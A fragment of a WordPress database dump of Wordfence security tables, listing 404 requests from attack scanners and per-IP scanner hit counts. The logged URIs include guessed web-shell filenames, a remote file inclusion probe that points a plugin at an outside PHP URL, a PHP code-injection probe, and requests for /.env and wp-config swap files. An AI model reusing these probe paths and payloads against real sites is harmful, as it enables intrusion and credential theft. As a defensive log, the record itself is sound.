(0x50b7a704ebb05b661237fbcfd8b73834, 1496471731, '/wp-content/themes/sketch/content-wrapper.php'),
(0x6f65cab2ffbab00c0ea18e7340aeeb49, 1496472036, '/wp-content/plugins/wp_module/wp_msg.php'),
(0x9e80199f6f6daa8a196036ea7815fe96, 1496472155, '/wp-content/plugins/plugin/info.php'),
(0x454f458ee76e59d7d6cdec4cdf1f5556, 1496479887, '/wp-content/etc.php'),
(0xbd92e94d0af6e7f75e9ba2e3959266ab, 1496479978, '/wp-content/themes/clubblog/db.php'),
(0x73402dc5c74dc4e9bc01662d007b999b, 1496485915, '/jm-ajax/upload_file/');
INSERT INTO `wp_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0x198296fbab726a4f18c49ddbde380529, 1496508183, '/wp-conde.php'),
(0x4a5b0ef5ac48878542ef4e3be275cfc6, 1496590526, '/wp-content/plugins/wp-db-backup-made/system.php.suspected'),
(0xaf903dac68342b295fce7adaacb9105e, 1496618894, '/wp-content/themes/coraline/inc/gswych.php'),
(0x54858c46985114bb432d04a431d9e31b, 1496639234, '/gtde.php'),
(0xbb100ea6016602a38191a2d558dc6cbc, 1496717196, '/wp-content/wflogs/rules.php'),
(0x87163982fcfe527dd38e9fe457a63770, 1496796872, '/mtsah16837.txt'),
(0x114df04a167c5d50462f15ee970c9736, 1496884592, '/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.laptopscreenrepair.net.au/search/cache.php'),
(0xb7c2b9df913878f9f2d4672b088dfca3, 1496904687, '/blog/xmlrpc.php'),
(0x699b99739af1922c95f400130086a9c3, 1497056294, '/hsgcxbf.php'),
(0xb54174b1e822af914b49199bc7b616ca, 1497056311, '/wp-content/plugins/easyrotator-for-wordpress/prv8.php'),
(0x86b0cfb99808354a15f6cc84785824ef, 1497056314, '/lol.php'),
(0x7d9312ca836e08fda6f63d469316c1e4, 1497056323, '/Wpwcwjqs.php'),
(0xafba916110f57e24328b9b06e7c2e0cc, 1497056327, '/ashdusc.php'),
(0x0cc2f75b8315b37048108b3da20d32a4, 1497056330, '/Maggis.php'),
(0xf84ff975bc98151b3be9d2cc366b86c7, 1497056334, '/imnus.php'),
(0x9181c74e348fc5a4184894bdc8420de4, 1497056338, '/Co0ds.php'),
(0x3a7c8e4e3bd67c2943e359700b0c2893, 1497056342, '/wp-xmlrpc.php'),
(0x848fd92f8689c562c6cf69099a894259, 1497056345, '/Xudfel.php'),
(0x619641e1f053214869492bd02b41ab6d, 1497056359, '/dep.php'),
(0x34ebe364fdfce9149e43bcec41d9d189, 1497056362, '/wp-content/indexx.php'),
(0x5db212de588d326976912e4bbf7cdfc8, 1497056365, '/axt.php'),
(0x63ba6ec2977beabeb27449b68b5a9a89, 1497056370, '/nimas.php'),
(0x62df5504e051bab1fb10e1963a38440f, 1497056374, '/Dducfj.php'),
(0x86c3a4a3b4ccc1eef26d3add317512b0, 1497056377, '/azra.php'),
(0x5951b748ef8db663a702570dfee53a42, 1497056386, '/language.php'),
(0x1e6845b673e5ee0d9e31935810172bdd, 1497058823, '/wp-content/plugins/website-contact-form-with-file-upload/readme.txt'),
(0x9e4ab2e446f8f70b3492ed0867157863, 1497077254, '/wp-includes/class-wp-upgrade.php'),
(0x97096a6229693496f3562e77c562fb2d, 1497289915, '/indax.php'),
(0x5e002934a0a55d903b2300808c6b6ff7, 1497449513, '/popup-pomo.phpdel'),
(0x82595531d0b66647186dc1c1f210007c, 1497468346, '/wp-content/plugins/wp-db-ajax-made/news_parser.class.php'),
(0x7c7997ff4f2327a7303903fc1109e89b, 1497473371, '/wp-content/plugins/wp-db-ajax-made-1/wp-db-backup.php'),
(0x875ea6f8f0936c33433ae1386b3ef05c, 1497503902, '/wp-content/indes.php'),
(0x8deb321fb58b80c365436d998963a065, 1497512349, '/wp-content/uploads/51217766.php'),
(0x21996c201a0ece3dee2e3a8ae50b6ed3, 1497512352, '/wp-content/plugins/revslider/temp/update_extract/57758779.php'),
(0x68c3a190a246fc70455772e4366acdd6, 1497517316, '/temp1-1.php'),
(0x6828158a6f30fb3a5b669d48e3d4f0ee, 1497535511, '/wp-content/plugins/onten/onten.php'),
(0xcc0b9b0a265a5476301193f6db0b3511, 1497544378, '/cron.php'),
(0x86c0b6962b0ecfc47cea5422d7b5a416, 1497561377, '/wp-content/plugins/paypal-donation-button/paypal-donation-button.php'),
(0x4047f2160b2130694ecfdee5cf19cb5c, 1497565704, '/wp-admin/network/etc.php'),
(0xb66758d591f59f55c212650ab423d928, 1497581790, '/wp-content/plugins/wp_module-1/wp_msg.php'),
(0x25ba172f5cb563ab95bffe0335d67458, 1497581999, '/wp-content/plugins/wp-db-ajax-made/db-update.php'),
(0x2d986a34c110420eb0523ac0830e3b92, 1497590294, '/wp-content/plugins/paypal-donation-button/db.php'),
(0xa0493099cd481d0e775a5228a43855bb, 1497590332, '/wp-content/plugins/wp-db-ajax-made/db_info.class.php'),
(0x364a604481c83f1c37374e807f85f56a, 1497594586, '/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php'),
(0x0e65214685d70914a9f8920030487a92, 1497598922, '/wp-content/plugins/wp-db-ajax-made/user-info.php'),
(0x16ec9c9d7078550933cf23ff0f5dd82d, 1497603434, '/wp-content/plugins/wp-db-ajax-made/db_model.php'),
(0x484851880e7765db6406eb11a29cdaf1, 1497612213, '/wp-content/plugins/wp-db-ajax-made/slide-menues.php'),
(0xec0b15550dd059cc93164c7f4600f601, 1497630584, '/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php'),
(0x1647b576ec73c4c374b9afe99dea17b5, 1497642987, '/wp-content/themes/twentythirteen/system.php'),
(0xae14383f23b7fa771daf3f5c2f260331, 1497647735, '/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php'),
(0x0a10178deb2eb8755e1c84c95981bc0b, 1497659627, '/models.php'),
(0xe67bd70c4d0d73d8ed08b3236c20b0b6, 1497703045, '/wp-content/themes/twentyeleven/content-wrapper.php'),
(0x945d0ec33836559657c982a2145496fc, 1497716833, '/wp-content/plugins/wp-db-ajax-made/pdo.inc.php'),
(0x953e637f02e507064c534586cb91f339, 1497716951, '/wp-content/plugins/wp-db-ajax-made-1/wp-ajax.php'),
(0x428e70e93005f1099d43b89a23fa1a12, 1497734838, '/framework.php'),
(0x22896a3a0170eb8f121d210afec325a7, 1497775936, '/wp-content/plugins/wp-db-ajax-made/rss_feeder.class.php'),
(0xf38a6c2dbaddeb0038ccfde1b59f0495, 1497784963, '/wp-forms-ajax.php'),
(0xfda43f11cc32ab907201c4bd8db06c00, 1497799079, '/wp-content/plugins/three-column-screen-layout/db.php'),
(0x1d3c29c20c278b2eea89a8dcfdb3cdd6, 1497800174, '/content-wrapper.php'),
(0x93ed7818515aa1385d0d3513fed01e70, 1497808633, '/wp-form-ajax.php'),
(0x93df865712d0550ca495a4aad438cc30, 1497838499, '/wp-content/plugins/easyrotator-for-wordpress/b.php'),
(0x813fd5386c0d7fd22fcb9980ac9eef28, 1497909941, '/wp-content/plugins/console_contact_form/upload_file.php?files'),
(0xf5141fb1f4c61489a2841515547454ba, 1497986486, '/wp-content/uploads/temp.php'),
(0x4c5062265a79b71b0466a92f130598c7, 1497987191, '/wp-content/plugins/temp.php'),
(0xf764edd4003e9fb9742aeb2301116965, 1497987551, '/wp-content/uploads/yt.php'),
(0xce22528875c06e5e48708ef50069f849, 1497987860, '/wp-inde.php'),
(0x1c61a309770649eaf5be41352e59de5d, 1497988728, '/images/yt.php'),
(0xd79a20b9776fe29c7e685f3b4ed5d358, 1497989217, '/modules/modules/temp.php'),
(0xb7880d9a768480d1e8526f598a895893, 1497989464, '/images/temp.php'),
(0xccc22c3dde4076ab420f3a76cb85e04b, 1497989725, '/wp-includes/css/temp.php'),
(0xecbb53d53dcfc12bb9af8d588d9c6a42, 1497989791, '/wp-content/uploads/2017/05/yt.php'),
(0x9ddb868b5e1ec85bf55d71750c300e2d, 1498023591, '/wp-content/plugins/Newspaper/readme.txt'),
(0x9c9d48ca1cebd29452555c59790ca00e, 1498146910, '/wp-content/uploads/wpcf7_captcha/1299398436.png'),
(0x977ef3045a90e7e4e006fcd94937c92e, 1498207783, '/wp-content/plugins/wp-db-ajax-made/user-info.php.suspected'),
(0x50e38f567d6d0260927bc13a3750afac, 1498235723, '/wp-forms-ajax.php.suspected'),
(0x77660c72b8cb0b9dd6c1bb6d9c07c35d, 1498236018, '/logo_img.php.suspected'),
(0x8d9fd9159a9b4e4c469c4d76d137e91e, 1498240292, '/wp-content/plugins/wp-db-ajax-made/db_info.class.php.suspected'),
(0xdbf276be9272be1a0d0b59654f8d3b9e, 1498253926, '/changelog.php'),
(0xdd5fdaeedeb6231be9018a064d2ee481, 1498283815, '/wp-content/themes/evolution/news_parser.class.php.suspected'),
(0xe84c54f676c3302fb4596106c2c81d7c, 1498293517, '/themes/popup-pomo.php'),
(0x9130bd37649e89bc2d18d5667db9dcc1, 1498297316, '/blogs/wp-admin/setup-config.php'),
(0x71b9eccc90aade532d9377c5b8628253, 1498297316, '/new/wp-admin/setup-config.php'),
(0xab388bd8c5bf983d9ae02ab51276484c, 1498297317, '/beta/wp-admin/setup-config.php'),
(0xb7900078617fd0979e14e0d04b6ddd0a, 1498306847, '/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php.suspected'),
(0x5a0962af1c33280cd7dd110820f4e4fc, 1498311277, '/wp-content/plugins/wp-db-ajax-made/pdo.inc.php.suspected'),
(0x3d60f43a2f20b421c24574617f3cfa3c, 1498317058, '/hello-world/#respond'),
(0xf0bcab8b60cf4e8ac86cf08b1072a710, 1498320951, '/wp-content/plugins/paypal-donation-button/paypal-donation-button.php.suspected'),
(0x33d60149fa511ee2658ded434ebdf4b9, 1498324473, '/wp-content/themes/sketch/edqvbo.php'),
(0x56d2d07a3d0b498c1598485cf9fa71e5, 1498329006, '/maint/popup-pomo.php'),
(0x43f9ac692b6e98c442ec4249dd41cf40, 1498329670, '/look.php.suspected'),
(0xcfd33441ea444d2188f6eec77a6f08f9, 1498338015, '/wp-content/plugins/wp-db-ajax-made/viewport-compatible.php.suspected'),
(0x3b1fd4cc53488c854e3cdc9098f3a2c1, 1498342363, '/wp-form-ajax.php.suspected'),
(0x6b88f5a8c697ebf573a8c7ccf0168d82, 1498365325, '/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php.suspected'),
(0x31da23ddbf50e3f322a3994a8dba15b3, 1498391788, '/wp-content/plugins/wp-db-ajax-made/db_model.php.suspected'),
(0x5ba2b07b8657a9485021473ee62536e3, 1498391804, '/wp-content/themes/sketch/404.php.suspected'),
(0xe0d03f6f23648ec6644a391a5a9309e9, 1498391989, '/wp-content/themes/evolution/content-wrapper.php'),
(0xe44cdb31bebdb49024111bceaf94e7e7, 1498405486, '/wp-content/themes/twentyeleven/wp-ajax.php'),
(0xb1352183892960b073c9cc04d4f832b6, 1498445498, '/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php.suspected'),
(0xc37fc4e1fb49bf3ad48811b50437e188, 1498451728, '/wp-includes/text/diff/engine/engine.php'),
(0x290095e1acaf1d658183e2d5337750c0, 1498452161, '/wp-includes/class.wp-tmps.php'),
(0xa4309ff6cdbc7cb4c2f2776cfb45bdb8, 1498629831, '/shop'),
(0xc7cd21a8009d90470f1bfbc5d8d09c8c, 1498635032, '/wp-content/upgrade/bb.php'),
(0x4e7af99855494c91af6c91ed20a86f44, 1498635104, '/wp-content/uploads/bb.php'),
(0x9e5afa8d46c60d0e732c2dfde24ff2c4, 1498638177, '/indes.php?15=printmd532423;exit;'),
(0xc0e765112b1a4241a3e58b322d39e01a, 1498881454, '/wp-content/uploads/wpcf7_captcha/1993469065.png'),
(0x1c8147d1c4ccb03a661cfe75f338a818, 1498973143, '/wp-content/plugins/fAaWBH.php'),
(0x6e433a22385961be6cbd332baeff8c9a, 1499072012, '/wp-content/plugins/easyrotator-for-wordpress/c.php'),
(0xd3ef13377a6e3b69175c96d6a447d204, 1499072173, '/wp-content/plugins/easyrotator-for-wordpress/one.php'),
(0x31f6ac6a8b378af503ad826b050a2a7c, 1499076701, '/wp-includes/class.wp.php?ok'),
(0x5924483009bd0c67e0d46275a0d389ac, 1499088986, '/wp-content/plugins/easyrotator-for-wordpress/cache.php'),
(0x7d946d336cf3d10dac6ebb3a496496c5, 1499089511, '/.env'),
(0xe73d5e794d91aa5f70012b7d0f6cc53c, 1499168708, '/wp-content/plugins/prettyphoto/pretyphoto.php'),
(0x756feb86d5025dc7806979a818303049, 1499478737, '/wp-content/plugins/wp-statistics/readme.txt'),
(0x58d155b1fabd1abe91252cd1d7759df3, 1499690263, '/wp-admin/uploader.php'),
(0xc6c8e150622437a0ccf7e366fcef274a, 1499714556, '/.wp-config.php.swp'),
(0xd244c4bb36a02dc8010f3639539e40d1, 1499762619, '/wp-admin/includes/lock46.php'),
(0x09b79677728cb0689f680889c3760771, 1499849669, '/wp-content/uploads/wpcf7_captcha/548452661.png'),
(0x644342e19819f2fd3534424eabf5e8e0, 1499891992, '/forum.php'),
(0x37e28ecceb359c3b37d6c44ba106e2a8, 1500012313, '/wp-content/plugins/wp-symposium/server/php/zTisCnHaSLBeVo.php'),
(0x2743772e92160359f47d782e0bf4e83e, 1500014056, '/wp-includes/js/tinymce/plugins/wpview/diff.php'),
(0xf6db6419258be781a02a10113dcdcd96, 1500086850, '/press/wp-admin/setup-config.php'),
(0xe9ddefa55073b7c72064e6f31d565217, 1500086850, '/main/wp-admin/setup-config.php'),
(0x3f8e4be7b8e809474df16629f5beaf58, 1500086851, '/protal/wp-admin/setup-config.php'),
(0x3d7e656a232257f783eb419dbc21ffc5, 1500086851, '/cms/wp-admin/setup-config.php'),
(0xae1d1ff3cb26fb3d687243adcc58d24d, 1500198487, '/wp-content/plugins/uploadify/readme.txt'),
(0x63a0a2279fdf9fe14f284cb462c832af, 1500203704, '/wp-content/plugins/wp-db-ajax-made-1/wp-ajax.php.suspected'),
(0x5ca06b70161f1debf3d06bca4e2e41d0, 1500216339, '/wp-content/themes/avada/content-wrapper.php'),
(0x86af645e22987b0c38e4a2987c656964, 1500352103, '/mxl.php'),
(0x10aa065a50a1088b8de8a6356916f88b, 1500435655, '/wp-content/uploads/2015/05/upl.php');

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfReverseCache`
--

CREATE TABLE `wp_wfReverseCache` (
  `IP` int(10) UNSIGNED NOT NULL,
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfScanners`
--

CREATE TABLE `wp_wfScanners` (
  `eMin` int(10) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `hits` smallint(5) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- Déchargement des données de la table `wp_wfScanners`
--

INSERT INTO `wp_wfScanners` (`eMin`, `IP`, `hits`) VALUES
(24910256, 1374769563, 10),
(24910100, 3587417960, 3),
(24910006, 3112277173, 1),
(24909865, 1539836988, 1),
(24909722, 1123631646, 1),
(24909696, 3112277173, 1),
(24909666, 1374841142, 12),
(24909627, 2995861269, 1),
(24909459, 632865533, 10),
(24908891, 3639891306, 1),
(24908798, 1538510707, 1),
(24908795, 1374841142, 12),
(24908780, 3112277173, 1),
(24908592, 1374769563, 10),
(24908445, 2187902172, 1),
(24908203, 1374841142, 12),
(24908143, 1374841142, 12),
(24908064, 3112277173, 1),
(24908052, 1538358342, 1),
(24907999, 1374769563, 10),
(24907770, 3639891306, 1),
(24907482, 1838094426, 10),
(24907480, 1838094426, 10),
(24907435, 1374841142, 9),
(24907434, 1374841142, 3),
(24907354, 1357699146, 1),
(24907237, 1374841142, 12),
(24907047, 1374841142, 12),
(24906988, 1374769563, 10),
(24906907, 1464066970, 10),
(24906799, 3256644604, 1),
(24906790, 3256644604, 1),
(24906786, 3256644604, 1),
(24906783, 3256644604, 1),
(24906649, 3256644604, 1),
(24906574, 2953337008, 2),
(24906568, 3256644604, 1),
(24906567, 1374841142, 12),
(24906564, 3256644604, 1),
(24906507, 3256644604, 2),
(24906476, 1123631313, 1),
(24906459, 3256644604, 1),
(24906418, 3256644604, 1),
(24906384, 3256644604, 1),
(24906366, 3256644604, 2),
(24906316, 3256644604, 1),
(24906290, 3256644604, 1),
(24906265, 3256644604, 1),
(24906219, 3256644604, 1),
(24906187, 3256644604, 1),
(24906186, 3256644604, 1),
(24906186, 1247482290, 5),
(24906180, 1247482290, 1),
(24906179, 1247482290, 9),
(24906178, 1247482290, 7),
(24906177, 1247482290, 12),
(24906176, 1247482290, 6),
(24906175, 1247482290, 8),
(24906174, 1247482290, 6),
(24906173, 1247482290, 5),
(24906172, 1247482290, 4),
(24906171, 1247482290, 5),
(24906170, 1247482290, 5),
(24906169, 1247482290, 3),
(24906168, 1247482290, 5),
(24906167, 1247482290, 4),
(24906166, 1247482290, 3),
(24906165, 1247482290, 3),
(24906164, 1247482290, 7),
(24906163, 1247482290, 7),
(24906162, 1247482290, 4),
(24906161, 1247482290, 7),
(24906160, 1247482290, 6),
(24906159, 1247482290, 4),
(24906158, 1247482290, 4),
(24906157, 1247482290, 3),
(24906156, 1247482290, 7),
(24906155, 1247482290, 5),
(24906154, 1247482290, 5),
(24906153, 1247482290, 3),
(24906152, 1247482290, 2),
(24906151, 1247482290, 4),
(24906150, 1247482290, 3),
(24906149, 1247482290, 3),
(24906148, 3256644604, 1),
(24906148, 1247482290, 3),
(24906147, 1247482290, 4),
(24906146, 1247482290, 3),
(24906145, 1247482290, 5),
(24906144, 1247482290, 6),
(24906143, 1247482290, 5),
(24906136, 3256644604, 1),
(24906081, 3256644604, 1),
(24906073, 3256644604, 1),
(24906008, 3256644604, 1),
(24905983, 3256644604, 1),
(24905965, 3256644604, 1),
(24905957, 1374841142, 12),
(24905917, 3256644604, 1),
(24905856, 1833311020, 1),
(24905843, 3256644604, 1),
(24905842, 3256644604, 1),
(24905737, 3256644604, 1),
(24905635, 3256644604, 1),
(24905589, 3256644604, 1),
(24905515, 3256644604, 1),
(24905493, 3256644604, 1),
(24905472, 3259896531, 1),
(24905459, 3256644604, 1),
(24905448, 1796538632, 1),
(24905406, 3256644604, 1),
(24905152, 1837924479, 10),
(24905107, 2916143010, 2),
(24905061, 1837931087, 1),
(24904992, 3639891306, 1),
(24895871, 3112277173, 1),
(24895651, 1374841142, 12),
(24895636, 2644818889, 1),
(24895616, 1539837611, 2),
(24904538, 1375112542, 10),
(24904468, 1834596154, 1),
(24904448, 1375112542, 10),
(24904443, 1375112542, 10),
(24904431, 3281714082, 1),
(24904234, 3587417960, 3),
(24904154, 1554035825, 1),
(24904135, 2953337008, 1),
(24904122, 3112277173, 1),
(24904094, 3567661094, 1),
(24903838, 1538628281, 12),
(24895473, 2989639598, 1),
(24895394, 1375112542, 10),
(24903759, 2989643491, 1),
(24895382, 1755877124, 1),
(24903336, 2945073626, 1),
(24903274, 3233510666, 1),
(24910792, 3112277173, 1),
(24911005, 1838104422, 10),
(24903013, 3024883593, 1),
(24903008, 3112277173, 1),
(24902957, 2297635928, 3),
(24902914, 1123635120, 1),
(24902898, 1834517617, 1),
(24902888, 2745985804, 1),
(24902797, 1374841142, 1),
(24902727, 1375112542, 10),
(24902681, 1375112542, 10),
(24902670, 1837474429, 1),
(24902669, 1837474429, 1),
(24902652, 1375112542, 10),
(24902228, 1123635091, 1),
(24902164, 2509961939, 1),
(24901576, 3112277173, 1),
(24901554, 3635199342, 24),
(24901553, 3635199342, 7),
(24901476, 3256644604, 1),
(24901421, 3256644604, 1),
(24901394, 1375112542, 10),
(24901390, 3256644604, 1),
(24901359, 3256644604, 1),
(24901338, 1370049247, 10),
(24901257, 3256644604, 1),
(24901191, 1123631302, 1),
(24901187, 3256644604, 1),
(24901123, 2745985804, 1),
(24901117, 3273261686, 10),
(24901112, 3273261686, 10),
(24901061, 3256644604, 1),
(24901036, 3256644604, 1),
(24901012, 3256644604, 1),
(24900984, 3256644604, 1),
(24900935, 3256644604, 1),
(24900688, 2499535434, 1),
(24900658, 1374838938, 2),
(24900657, 1374838938, 1),
(24900299, 1355389698, 1),
(24900176, 1538628086, 1),
(24900161, 1375112542, 10),
(24900036, 2961112076, 1),
(24899941, 1374841142, 12),
(24899738, 3112277173, 1),
(24899493, 3250575437, 1),
(24899135, 3112277173, 1),
(24898787, 1123633555, 1),
(24898766, 2499535434, 1),
(24898667, 1374841142, 6),
(24898661, 1374841142, 6),
(24898583, 1374841142, 12),
(24895304, 1837860862, 4),
(24894657, 1123632467, 1),
(24894523, 1374841142, 12),
(24894230, 1375112542, 10),
(24894216, 1834516790, 1),
(24894170, 1538699446, 1),
(24894164, 1375112542, 10),
(24911681, 1796538632, 1),
(24898491, 1538308269, 1),
(24898466, 3267064321, 1),
(24898367, 3112277173, 1),
(24897995, 3112277173, 1),
(24897855, 3281714082, 1),
(24897545, 2499535434, 1),
(24897376, 1374841142, 12),
(24897268, 1837482126, 1),
(24897240, 3112277173, 1),
(24897194, 1374841142, 4),
(24897173, 3281714082, 1),
(24897118, 1374841142, 12),
(24897117, 1837274001, 1),
(24881297, 1837165719, 10),
(24880718, 1837522582, 1),
(24880394, 2499535434, 1),
(24880385, 2960257375, 1),
(24880367, 2960257375, 1),
(24880346, 2960257375, 1),
(24880345, 2960257375, 1),
(24880342, 2960257375, 1),
(24880337, 2960257375, 1),
(24880333, 2960257375, 1),
(24880305, 2960257375, 1),
(24880295, 2960257375, 1),
(24880282, 2960257375, 1),
(24880277, 2960257375, 1),
(24880271, 2960257375, 1),
(24880264, 2960257375, 1),
(24880251, 2960257375, 1),
(24880238, 2960257375, 1),
(24880207, 2960257375, 1),
(24880194, 2960257375, 1),
(24880189, 2960257375, 1),
(24880178, 2960257375, 1),
(24880164, 2960257375, 1),
(24880163, 2960257375, 1),
(24880136, 2960259765, 1),
(24880127, 2960259765, 1),
(24880110, 2960259765, 1),
(24880089, 2960259765, 1),
(24880082, 2960259765, 1),
(24880055, 2960259765, 1),
(24880045, 693628318, 1),
(24880032, 1837165719, 10),
(24880027, 2960259765, 1),
(24879856, 2960259765, 1),
(24894137, 1355389698, 1),
(24894050, 1355294142, 1),
(24893971, 1837906296, 1),
(24893853, 1834495119, 1),
(24892994, 1375112542, 10),
(24892848, 1375112542, 10),
(24891878, 3233510666, 2),
(24891564, 1375112542, 10),
(24891563, 1538461206, 1),
(24891528, 2297635928, 3),
(24891509, 1374841142, 12),
(24891449, 1570674703, 1),
(24891313, 1123631646, 1),
(24891065, 1538506743, 1),
(24891054, 635303436, 1),
(24890816, 2745971880, 1),
(24890294, 2509962920, 1),
(24890206, 3323226906, 1),
(24890198, 2499535434, 1),
(24890187, 1374824443, 1),
(24889919, 3639891306, 1),
(24889880, 3287437334, 1),
(24889685, 1375112542, 7),
(24889684, 1375112542, 3),
(24889577, 1538649748, 3),
(24889501, 3234106972, 2),
(24889029, 2499535434, 1),
(24888885, 3163187461, 1),
(24888772, 1374841142, 12),
(24888605, 1837857107, 1),
(24888420, 1837953980, 10),
(24888205, 2995859706, 10),
(24888172, 3267064321, 1),
(24887659, 1539836988, 1),
(24887193, 1837165719, 6),
(24887192, 1837165719, 4),
(24887001, 1837382274, 1),
(24886860, 1837165719, 10),
(24886391, 1123632437, 1),
(24886195, 1539836988, 1),
(24885984, 1123632438, 1),
(24885979, 1374841142, 4),
(24885974, 1374841142, 2),
(24885931, 1538628250, 2),
(24885819, 1837165719, 10),
(24885589, 1374841142, 12),
(24885446, 2661914122, 1),
(24885399, 2783008832, 1),
(24884943, 1837858581, 10),
(24884720, 1338304744, 1),
(24883905, 1837933865, 10),
(24882313, 1834499396, 1),
(24882387, 1123631313, 1),
(24879924, 2960259765, 1),
(24882399, 2655379749, 1),
(24896060, 3112277173, 1),
(24896407, 3112277173, 1),
(24896526, 3252386809, 1),
(24883904, 2297635928, 1),
(24883903, 2297635928, 1),
(24883902, 2297635928, 1),
(24883749, 3639891306, 1),
(24883608, 632890059, 10),
(24881386, 1837165719, 10),
(24896528, 3252386809, 1),
(24881566, 1796538632, 1),
(24881653, 2499535434, 1),
(24883576, 1538649748, 3),
(24881691, 1539836988, 1),
(24883574, 96767447, 1),
(24883561, 1837165719, 10),
(24883516, 1837165719, 10),
(24896686, 3112277173, 1),
(24896820, 2366145591, 1),
(24879930, 2960259765, 1),
(24882262, 1439284665, 1),
(24883271, 3112255039, 5),
(24883270, 3112255039, 9),
(24883070, 2499535434, 1),
(24896965, 3112277173, 1),
(24879880, 2960259765, 1),
(24883044, 2996488216, 1),
(24879883, 2960259765, 1),
(24879910, 2960259765, 1),
(24879951, 2960259765, 1),
(24879989, 2960259765, 1),
(24879995, 2960259765, 1),
(24882910, 1374841142, 12),
(24896887, 1374841142, 12),
(24896922, 1324940073, 1),
(24882854, 1837165719, 10),
(24882794, 1568498494, 29),
(24896926, 2297635928, 1),
(24880009, 2960259765, 1),
(24880021, 2960259765, 1),
(24880022, 2960259765, 1),
(24896941, 2644818889, 1),
(24896942, 1837372382, 1),
(24880023, 2960259765, 2),
(24882793, 1568498494, 2),
(24882763, 1837165719, 8),
(24882762, 1837165719, 2),
(24911728, 1374769563, 10),
(24911764, 1374841142, 12),
(24912127, 1539836988, 1),
(24912452, 783526296, 10),
(24912792, 2513049709, 11),
(24912793, 2513049709, 6),
(24912864, 1123632438, 1),
(24913187, 3639891306, 1),
(24913305, 1374841142, 9),
(24913306, 1374841142, 3),
(24913516, 3657086074, 1),
(24913593, 1347558503, 1),
(24913712, 1439270026, 1),
(24913838, 3154455105, 10),
(24913926, 2763076217, 1),
(24914083, 3233510666, 2),
(24914293, 1538461267, 2),
(24914318, 1374769563, 10),
(24914411, 1123632437, 1),
(24914654, 783531305, 10),
(24914860, 1123633622, 1),
(24914947, 2997442321, 1),
(24915163, 1374841142, 12),
(24915212, 1374769563, 10),
(24915235, 1374841142, 12),
(24915351, 2509961901, 1),
(24915401, 1053115180, 1),
(24915488, 2783008832, 1),
(24915592, 632871405, 10),
(24915766, 783517035, 10),
(24916104, 1374769563, 2),
(24916167, 1123631313, 1),
(24916400, 3639891306, 1),
(24916644, 1374769563, 10),
(24916779, 1374841142, 6),
(24916780, 1374841142, 6),
(24916846, 1375132497, 1),
(24917179, 1374841142, 12),
(24917192, 3024883467, 1),
(24917311, 1342987974, 1),
(24917362, 1796538632, 1),
(24917423, 1374841142, 12),
(24917425, 1374769563, 10),
(24917563, 1374841142, 12),
(24917787, 1538452237, 12),
(24918203, 86661764, 1),
(24918259, 3024883478, 1),
(24918622, 783539426, 10),
(24918690, 2499535434, 1),
(24918896, 1374841142, 12),
(24918898, 1374769563, 6),
(24918899, 1374769563, 4),
(24918910, 1374769563, 10),
(24918973, 1374841142, 3),
(24918974, 1374841142, 9),
(24919275, 1123633629, 1),
(24919525, 1374769563, 10),
(24919734, 1323276251, 1),
(24919789, 3561526078, 1),
(24919844, 2366145567, 1),
(24920000, 1439270754, 1),
(24920169, 2499535434, 1),
(24920463, 1374841142, 12),
(24920999, 632825899, 9),
(24921011, 1374841142, 12),
(24921097, 1374841142, 12),
(24921150, 3154448177, 10),
(24921159, 3154448177, 10),
(24921164, 3154448177, 10),
(24921344, 1374841142, 12),
(24921573, 3039911297, 1),
(24921781, 1837876689, 1),
(24921790, 1374769563, 10),
(24922336, 2366148113, 1),
(24922691, 1374769563, 7),
(24922692, 1374769563, 3),
(24922844, 1374769563, 10),
(24923014, 1952643501, 1),
(24923117, 1374841142, 12),
(24923544, 1123631732, 1),
(24923969, 3267064321, 1),
(24924131, 2499535434, 1),
(24924171, 1538458305, 1),
(24924273, 1538512707, 1),
(24924299, 3166481419, 3),
(24924383, 2644818889, 1),
(24924489, 1123633622, 1),
(24924536, 2745986199, 1),
(24924632, 1374769563, 10),
(24924647, 1374843811, 1),
(24924697, 1538567300, 1),
(24924760, 1374841142, 12),
(24924834, 3161848526, 1),
(24925288, 3652617308, 1),
(24925603, 1539836988, 1),
(24925659, 2499535434, 1),
(24925776, 3154495934, 10),
(24926144, 1374769563, 10),
(24926265, 1374841142, 12),
(24926544, 3192595645, 1),
(24926683, 1123633555, 1),
(24927046, 3639891306, 1),
(24927094, 1374769563, 10),
(24927451, 1374841142, 12),
(24927461, 1375117429, 1),
(24927517, 1374769563, 10),
(24928274, 1374769563, 6),
(24928275, 1374769563, 4),
(24928343, 1374841142, 12),
(24928403, 1374841142, 12),
(24928443, 3639891306, 1),
(24928520, 1374769563, 3),
(24928542, 1539836988, 2),
(24928587, 1374769563, 4),
(24928588, 1374769563, 6),
(24929113, 1540278443, 10),
(24929408, 1123633950, 1),
(24929499, 2499535434, 1),
(24929622, 3024883600, 1),
(24929679, 1374769563, 10),
(24929750, 1374769563, 7),
(24929751, 1374769563, 3),
(24929825, 1374769563, 10),
(24930047, 1834609551, 1),
(24930202, 3587417960, 3),
(24930494, 2366145567, 1),
(24930795, 3098069115, 1),
(24930799, 3098069115, 1),
(24930824, 657097413, 1),
(24930845, 3281714129, 1),
(24931146, 1834609551, 1),
(24931157, 1374769563, 10),
(24931267, 2809283056, 1),
(24931283, 1123632542, 1),
(24931325, 1539836988, 1),
(24931556, 1374841142, 12),
(24931653, 1053970098, 1),
(24931874, 1374769563, 10),
(24932126, 1082769246, 1),
(24932140, 2994513029, 1),
(24932142, 2994513029, 1),
(24932178, 3559911201, 1),
(24932573, 1538656104, 12),
(24932737, 2509950143, 1),
(24932876, 1374769563, 10),
(24932879, 1546285845, 1),
(24933036, 3373404845, 3),
(24933303, 1374769563, 10),
(24933558, 1546285845, 1),
(24933800, 1962951373, 1),
(24934027, 1374841142, 12),
